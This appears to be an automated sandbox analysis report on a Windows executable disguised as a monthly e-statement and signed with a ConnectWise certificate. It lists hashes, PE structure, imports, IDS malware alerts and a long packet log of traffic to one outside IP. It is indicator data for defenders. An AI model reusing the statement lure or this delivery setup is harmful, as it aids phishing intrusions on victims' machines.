                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                                                                                                                                                                                                  MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                                                                                                                                                                                                  SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                                                                                                                                                                                                  SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                                                                                                                                                                                                  SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                  File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):1835008
                                                                                                                                                                                                                                                                  Entropy (8bit):4.416874755860817
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:6144:Scifpi6ceLPL9skLmb0moSWSPtaJG8nAgex285i2MMhA20X4WABlGuNP5+:/i58oSWIZBk2MM6AFBFo
                                                                                                                                                                                                                                                                  MD5:C0CBA4248B71C41D7366B4C8C55AB5AE
                                                                                                                                                                                                                                                                  SHA1:7EA5CAD025A1E47B00A71F81AF3A9B44E1B520C3
                                                                                                                                                                                                                                                                  SHA-256:B4A2CBEEDC95CA03A131B5DD38675F16B2607DB6683AED2600283DFE236E0A2C
                                                                                                                                                                                                                                                                  SHA-512:6148434F265CE40FCDB03BDFF51314A03CD00E062B35CAF3ED5D83A12F741926A7A35A13B011E4348F1F3C38FCF842BAA52DD6E79A7E261865047253F7347904
                                                                                                                                                                                                                                                                  Malicious:false
Preview:regf ... \AppCompat\Programs\Amcache.hve ... (remainder is binary padding)
                                                                                                                                                                                                                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                  Entropy (8bit):6.514403774293619
                                                                                                                                                                                                                                                                  TrID:
                                                                                                                                                                                                                                                                  • Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: monthly-eStatementForum120478962.Client.exe
File size: 83'376 bytes
MD5: 27bd2490fd75556aab2df57ea7c1147f
SHA1: 4eb9656ede1fed23fdaeb67815afcd489ded0f77
SHA256: 7d6376247db9e267f27d1d6bf32b48afcab0ad277706fc0135d803645f7852a5
SHA512: b70743c0c03cad64c9f258db7de324ca083ec15ad922f16460febbe47f018aedcbf83e39d8f2b4a57ff77d71727e11a2585264de9dadb15f0ea18abe1e34b350
SSDEEP: 1536:JoG6KpY6Qi3yj2wyq4HwiMO10HVLCJRpsWr6cdaxPBJYYX7gxD:TenkyfPAwiMq0RqRfbaxZJYYX
TLSH: 0F835B43B5E18875E9730E3118B1D9B4593FBD110EA48EAF3398426A0F351D19E3AE7B
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....... ycId...d...d.......n...............|.......A.......v.......v...m`..a...d...........e.......e.......e...Richd...........PE..L..
Icon Hash: 00928e8e8686b000
Entrypoint: 0x401489
Entrypoint Section: .text
Digitally signed: true
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp: 0x66BBDDB2 [Tue Aug 13 22:26:58 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 5
OS Version Minor: 1
File Version Major: 5
File Version Minor: 1
Subsystem Version Major: 5
Subsystem Version Minor: 1
Import Hash: 37d5c89163970dd3cc69230538a1b72b
Signature Valid: true
Signature Issuer: CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1, O="DigiCert, Inc.", C=US
Signature Validation Error: The operation completed successfully
Error Number: 0
Not Before, Not After
• 17/08/2022 02:00:00 16/08/2025 01:59:59
Subject Chain
• CN="Connectwise, LLC", O="Connectwise, LLC", L=Tampa, S=Florida, C=US
Version: 3
Thumbprint MD5: AAE704EC2810686C3BF7704E660AFB5D
Thumbprint SHA-1: 4C2272FBA7A7380F55E2A424E9E624AEE1C14579
Thumbprint SHA-256: 82B4E7924D5BED84FB16DDF8391936EB301479CEC707DC14E23BC22B8CDEAE28
Serial: 0B9360051BCCF66642998998D5BA97CE
Instruction
call 00007FA13C5671BAh
jmp 00007FA13C566C6Fh
push ebp
mov ebp, esp
push 00000000h
call dword ptr [0040B048h]
push dword ptr [ebp+08h]
call dword ptr [0040B044h]
push C0000409h
call dword ptr [0040B04Ch]
push eax
call dword ptr [0040B050h]
pop ebp
ret
push ebp
mov ebp, esp
sub esp, 00000324h
push 00000017h
call dword ptr [0040B054h]
test eax, eax
je 00007FA13C566DF7h
push 00000002h
pop ecx
int 29h
mov dword ptr [004118C0h], eax
mov dword ptr [004118BCh], ecx
mov dword ptr [004118B8h], edx
mov dword ptr [004118B4h], ebx
mov dword ptr [004118B0h], esi
mov dword ptr [004118ACh], edi
mov word ptr [004118D8h], ss
mov word ptr [004118CCh], cs
mov word ptr [004118A8h], ds
mov word ptr [004118A4h], es
mov word ptr [004118A0h], fs
mov word ptr [0041189Ch], gs
pushfd
pop dword ptr [004118D0h]
mov eax, dword ptr [ebp+00h]
mov dword ptr [004118C4h], eax
mov eax, dword ptr [ebp+04h]
mov dword ptr [004118C8h], eax
lea eax, dword ptr [ebp+08h]
mov dword ptr [004118D4h], eax
mov eax, dword ptr [ebp-00000324h]
mov dword ptr [00411810h], 00010001h
Programming Language:
• [IMP] VS2008 SP1 build 30729
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x1060c | 0x3c | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x13000 | 0x1e0 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x11800 | 0x2db0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x14000 | 0xddc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0xfe38 | 0x70 | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0xfd78 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0xb000 | 0x13c | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x9cf8 | 0x9e00 | bae4521030709e187bdbe8a34d7bf731 | False | 0.6035650712025317 | data | 6.581464957368758 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0xb000 | 0x5d58 | 0x5e00 | ec94ce6ebdbe57640638e0aa31d08896 | False | 0.4178025265957447 | Applesoft BASIC program data, first line number 1 | 4.843224204192078 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x11000 | 0x11cc | 0x800 | 04a548a5c04675d08166d3823a6bf61b | False | 0.16357421875 | data | 2.0120795802951505 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x13000 | 0x1e0 | 0x200 | aa256780346be2e1ee49ac6d69d2faff | False | 0.52734375 | data | 4.703723272345726 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x14000 | 0xddc | 0xe00 | 908329e10a1923a3c4938a10d44237d9 | False | 0.7776227678571429 | data | 6.495696626464028 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_MANIFEST | 0x13060 | 0x17d | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States | 0.5931758530183727
DLL | Import
KERNEL32.dll | LocalFree, GetProcAddress, LoadLibraryA, Sleep, LocalAlloc, GetModuleFileNameW, DecodePointer, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, GetModuleHandleW, RtlUnwind, GetLastError, SetLastError, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, LoadLibraryExW, RaiseException, GetStdHandle, WriteFile, GetModuleFileNameA, MultiByteToWideChar, WideCharToMultiByte, ExitProcess, GetModuleHandleExW, GetACP, CloseHandle, HeapAlloc, HeapFree, FindClose, FindFirstFileExA, FindNextFileA, IsValidCodePage, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, LCMapStringW, SetStdHandle, GetFileType, GetStringTypeW, GetProcessHeap, HeapSize, HeapReAlloc, FlushFileBuffers, GetConsoleCP, GetConsoleMode, SetFilePointerEx, WriteConsoleW, CreateFileW
CRYPT32.dll | CertDeleteCertificateFromStore, CryptMsgGetParam, CertCloseStore, CryptQueryObject, CertAddCertificateContextToStore, CertFindAttribute, CertFreeCertificateContext, CertCreateCertificateContext, CertOpenSystemStoreA
Language of compilation system | Country where language is spoken | Map
English | United States |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-11-08T11:09:27.640004+0100 | 2009897 | ET MALWARE Possible Windows executable sent when remote host claims to send html content | 1 | 194.59.30.201 | 443 | 192.168.2.7 | 49730 | TCP
2024-11-08T11:09:29.098621+0100 | 2009897 | ET MALWARE Possible Windows executable sent when remote host claims to send html content | 1 | 194.59.30.201 | 443 | 192.168.2.7 | 49737 | TCP
2024-11-08T11:09:34.163926+0100 | 2009897 | ET MALWARE Possible Windows executable sent when remote host claims to send html content | 1 | 194.59.30.201 | 443 | 192.168.2.7 | 49771 | TCP
2024-11-08T11:09:35.005158+0100 | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 1 | 4.175.87.197 | 443 | 192.168.2.7 | 49772 | TCP
2024-11-08T11:09:35.536470+0100 | 2009897 | ET MALWARE Possible Windows executable sent when remote host claims to send html content | 1 | 194.59.30.201 | 443 | 192.168.2.7 | 49779 | TCP
2024-11-08T11:09:37.158581+0100 | 2009897 | ET MALWARE Possible Windows executable sent when remote host claims to send html content | 1 | 194.59.30.201 | 443 | 192.168.2.7 | 49790 | TCP
2024-11-08T11:09:38.514160+0100 | 2009897 | ET MALWARE Possible Windows executable sent when remote host claims to send html content | 1 | 194.59.30.201 | 443 | 192.168.2.7 | 49798 | TCP
2024-11-08T11:09:41.447672+0100 | 2009897 | ET MALWARE Possible Windows executable sent when remote host claims to send html content | 1 | 194.59.30.201 | 443 | 192.168.2.7 | 49814 | TCP
2024-11-08T11:09:43.298710+0100 | 2009897 | ET MALWARE Possible Windows executable sent when remote host claims to send html content | 1 | 194.59.30.201 | 443 | 192.168.2.7 | 49825 | TCP
2024-11-08T11:10:13.054100+0100 | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 1 | 20.12.23.50 | 443 | 192.168.2.7 | 49993 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:26.304140091 CET49730443192.168.2.7194.59.30.201
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:26.304397106 CET49730443192.168.2.7194.59.30.201
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:26.304415941 CET44349730194.59.30.201192.168.2.7
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:27.148121119 CET44349730194.59.30.201192.168.2.7
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:27.158389091 CET49730443192.168.2.7194.59.30.201
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:27.158423901 CET44349730194.59.30.201192.168.2.7
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:27.519511938 CET44349730194.59.30.201192.168.2.7
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:27.519541979 CET44349730194.59.30.201192.168.2.7
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:27.519556999 CET44349730194.59.30.201192.168.2.7
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:27.519613981 CET49730443192.168.2.7194.59.30.201
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:27.519643068 CET44349730194.59.30.201192.168.2.7
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:27.519659996 CET49730443192.168.2.7194.59.30.201
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:27.519686937 CET49730443192.168.2.7194.59.30.201
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:27.522094965 CET44349730194.59.30.201192.168.2.7
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:27.522116899 CET44349730194.59.30.201192.168.2.7
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:27.522164106 CET49730443192.168.2.7194.59.30.201
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:27.522192001 CET44349730194.59.30.201192.168.2.7
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:27.522208929 CET49730443192.168.2.7194.59.30.201
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:27.572768927 CET49730443192.168.2.7194.59.30.201
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:27.638353109 CET44349730194.59.30.201192.168.2.7
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:27.638376951 CET44349730194.59.30.201192.168.2.7
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:27.638489008 CET49730443192.168.2.7194.59.30.201
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:27.638528109 CET44349730194.59.30.201192.168.2.7
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:27.640023947 CET44349730194.59.30.201192.168.2.7
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:27.640049934 CET44349730194.59.30.201192.168.2.7
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:27.640106916 CET49730443192.168.2.7194.59.30.201
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:27.640119076 CET44349730194.59.30.201192.168.2.7
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:27.640625000 CET49730443192.168.2.7194.59.30.201
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:27.756849051 CET44349730194.59.30.201192.168.2.7
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:27.756869078 CET44349730194.59.30.201192.168.2.7
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:27.756952047 CET49730443192.168.2.7194.59.30.201
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:27.756980896 CET44349730194.59.30.201192.168.2.7
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:27.757041931 CET49730443192.168.2.7194.59.30.201
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:27.758028984 CET44349730194.59.30.201192.168.2.7
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:27.758064032 CET44349730194.59.30.201192.168.2.7
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:27.758095026 CET49730443192.168.2.7194.59.30.201
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:27.758101940 CET44349730194.59.30.201192.168.2.7
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:27.758116961 CET44349730194.59.30.201192.168.2.7
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:27.758130074 CET49730443192.168.2.7194.59.30.201
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:27.758143902 CET49730443192.168.2.7194.59.30.201
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:27.758172989 CET49730443192.168.2.7194.59.30.201
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:27.758600950 CET49730443192.168.2.7194.59.30.201
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:27.770905972 CET49737443192.168.2.7194.59.30.201
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:27.770940065 CET44349737194.59.30.201192.168.2.7
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:27.771006107 CET49737443192.168.2.7194.59.30.201
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:27.771197081 CET49737443192.168.2.7194.59.30.201
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:27.771207094 CET44349737194.59.30.201192.168.2.7
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:28.604681015 CET44349737194.59.30.201192.168.2.7
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:28.624432087 CET49737443192.168.2.7194.59.30.201
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:28.624444008 CET44349737194.59.30.201192.168.2.7
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:28.980269909 CET44349737194.59.30.201192.168.2.7
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:28.980298042 CET44349737194.59.30.201192.168.2.7
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:28.980314016 CET44349737194.59.30.201192.168.2.7
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:28.980402946 CET49737443192.168.2.7194.59.30.201
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:28.980422020 CET44349737194.59.30.201192.168.2.7
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:28.980473042 CET49737443192.168.2.7194.59.30.201
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:28.980494022 CET49737443192.168.2.7194.59.30.201
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:28.981983900 CET44349737194.59.30.201192.168.2.7
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:28.982001066 CET44349737194.59.30.201192.168.2.7
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:28.982074022 CET49737443192.168.2.7194.59.30.201
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:28.982080936 CET44349737194.59.30.201192.168.2.7
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:29.025918961 CET49737443192.168.2.7194.59.30.201
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:29.097784996 CET44349737194.59.30.201192.168.2.7
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:29.097812891 CET44349737194.59.30.201192.168.2.7
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:29.097915888 CET49737443192.168.2.7194.59.30.201
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:29.097930908 CET44349737194.59.30.201192.168.2.7
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:29.097997904 CET49737443192.168.2.7194.59.30.201
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:29.098629951 CET44349737194.59.30.201192.168.2.7
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:29.098675013 CET44349737194.59.30.201192.168.2.7
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:29.098691940 CET49737443192.168.2.7194.59.30.201
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:29.098700047 CET44349737194.59.30.201192.168.2.7
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:29.098727942 CET49737443192.168.2.7194.59.30.201
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:29.099160910 CET49737443192.168.2.7194.59.30.201
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:29.099204063 CET44349737194.59.30.201192.168.2.7
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:29.099261045 CET49737443192.168.2.7194.59.30.201
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:29.107824087 CET49748443192.168.2.7194.59.30.201
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:29.107858896 CET44349748194.59.30.201192.168.2.7
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:29.107923985 CET49748443192.168.2.7194.59.30.201
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:29.108160019 CET49748443192.168.2.7194.59.30.201
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:29.108171940 CET44349748194.59.30.201192.168.2.7
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:29.951842070 CET44349748194.59.30.201192.168.2.7
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:29.951916933 CET49748443192.168.2.7194.59.30.201
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:29.953887939 CET49748443192.168.2.7194.59.30.201
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:29.953895092 CET44349748194.59.30.201192.168.2.7
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:29.954191923 CET44349748194.59.30.201192.168.2.7
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:35.535248041 CET44349779194.59.30.201192.168.2.7
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:35.535270929 CET44349779194.59.30.201192.168.2.7
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:35.535389900 CET49779443192.168.2.7194.59.30.201
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:35.535409927 CET44349779194.59.30.201192.168.2.7
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:35.536492109 CET44349779194.59.30.201192.168.2.7
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:35.536511898 CET44349779194.59.30.201192.168.2.7
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:35.536555052 CET49779443192.168.2.7194.59.30.201
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:35.536565065 CET44349779194.59.30.201192.168.2.7
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:35.536602974 CET49779443192.168.2.7194.59.30.201
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:35.536636114 CET49779443192.168.2.7194.59.30.201
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:35.538304090 CET44349779194.59.30.201192.168.2.7
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:35.538322926 CET44349779194.59.30.201192.168.2.7
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:35.538362980 CET49779443192.168.2.7194.59.30.201
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:35.538369894 CET44349779194.59.30.201192.168.2.7
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:35.538402081 CET49779443192.168.2.7194.59.30.201
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:35.538424969 CET49779443192.168.2.7194.59.30.201
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:35.539673090 CET44349779194.59.30.201192.168.2.7
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:35.539689064 CET44349779194.59.30.201192.168.2.7
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:35.539767981 CET49779443192.168.2.7194.59.30.201
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:35.539777040 CET44349779194.59.30.201192.168.2.7
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:35.539932966 CET49779443192.168.2.7194.59.30.201
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:35.657866955 CET44349779194.59.30.201192.168.2.7
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:35.657886028 CET44349779194.59.30.201192.168.2.7
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:35.657998085 CET49779443192.168.2.7194.59.30.201
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:35.658029079 CET44349779194.59.30.201192.168.2.7
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:35.658092022 CET49779443192.168.2.7194.59.30.201
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:35.658519983 CET44349779194.59.30.201192.168.2.7
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:35.658530951 CET44349779194.59.30.201192.168.2.7
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:35.658613920 CET49779443192.168.2.7194.59.30.201
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:35.658621073 CET44349779194.59.30.201192.168.2.7
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:35.658698082 CET49779443192.168.2.7194.59.30.201
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:35.659847975 CET44349779194.59.30.201192.168.2.7
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:35.659863949 CET44349779194.59.30.201192.168.2.7
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:35.659950018 CET49779443192.168.2.7194.59.30.201
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:35.659956932 CET44349779194.59.30.201192.168.2.7
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:35.660069942 CET49779443192.168.2.7194.59.30.201
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:35.662609100 CET44349779194.59.30.201192.168.2.7
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:35.662625074 CET44349779194.59.30.201192.168.2.7
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:35.662683964 CET49779443192.168.2.7194.59.30.201
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:35.662689924 CET44349779194.59.30.201192.168.2.7
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:35.662772894 CET49779443192.168.2.7194.59.30.201
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:35.663613081 CET44349779194.59.30.201192.168.2.7
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:35.663630962 CET44349779194.59.30.201192.168.2.7
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:35.663692951 CET49779443192.168.2.7194.59.30.201
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:35.663698912 CET44349779194.59.30.201192.168.2.7
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:35.663805008 CET49779443192.168.2.7194.59.30.201
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:35.780044079 CET44349779194.59.30.201192.168.2.7
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:35.780070066 CET44349779194.59.30.201192.168.2.7
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:35.780119896 CET49779443192.168.2.7194.59.30.201
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:35.780138969 CET44349779194.59.30.201192.168.2.7
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:35.780148029 CET44349779194.59.30.201192.168.2.7
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:35.780169010 CET49779443192.168.2.7194.59.30.201
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:35.780188084 CET49779443192.168.2.7194.59.30.201
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:35.780199051 CET44349779194.59.30.201192.168.2.7
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:35.780224085 CET44349779194.59.30.201192.168.2.7
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:35.780270100 CET49779443192.168.2.7194.59.30.201
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:35.780747890 CET49779443192.168.2.7194.59.30.201
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:35.835306883 CET49790443192.168.2.7194.59.30.201
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:35.835341930 CET44349790194.59.30.201192.168.2.7
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:35.835438013 CET49790443192.168.2.7194.59.30.201
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:35.835788012 CET49790443192.168.2.7194.59.30.201
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:35.835800886 CET44349790194.59.30.201192.168.2.7
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:36.671829939 CET44349790194.59.30.201192.168.2.7
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:36.683588982 CET49790443192.168.2.7194.59.30.201
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:36.683603048 CET44349790194.59.30.201192.168.2.7
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:37.040561914 CET44349790194.59.30.201192.168.2.7
